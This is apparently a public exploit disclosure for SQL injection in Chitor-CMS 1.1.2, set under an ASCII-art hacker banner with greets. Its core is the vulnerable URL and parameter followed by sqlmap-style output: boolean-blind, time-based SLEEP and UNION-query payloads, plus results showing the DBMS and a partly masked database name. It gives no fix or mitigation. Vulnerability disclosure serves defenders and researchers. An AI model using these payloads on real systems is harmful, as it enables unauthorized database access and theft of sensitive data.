┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://github.com/waqaskanju/Chitor-CMS │ │ Vendor : Waqas Ahmad │ │ Software : Chitor-CMS 1.1.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /dmc.php https://website/dmc.php?rollno=[SQLI]&submit= GET parameter 'rollno' is vulnerable to SQLI [+] Starting the Attack --- Parameter: rollno (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: rollno=(SELECT (CASE WHEN (8157=8157) THEN 123 ELSE (SELECT 6602 UNION SELECT 8316) END))&submit=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rollno=123 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))WFHu)&submit=1 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: rollno=123 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x795671465a5a414e7252507a55426e644b53514b45556c7a554f73727674517276705877617a5541,0x71627a7171),NULL,NULL,NULL-- -&submit=1 --- [INFO] the back-end DBMS is MySQL web application technology: PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [INFO] fetching current database current database: '***0611***_chitor_db' [-] Done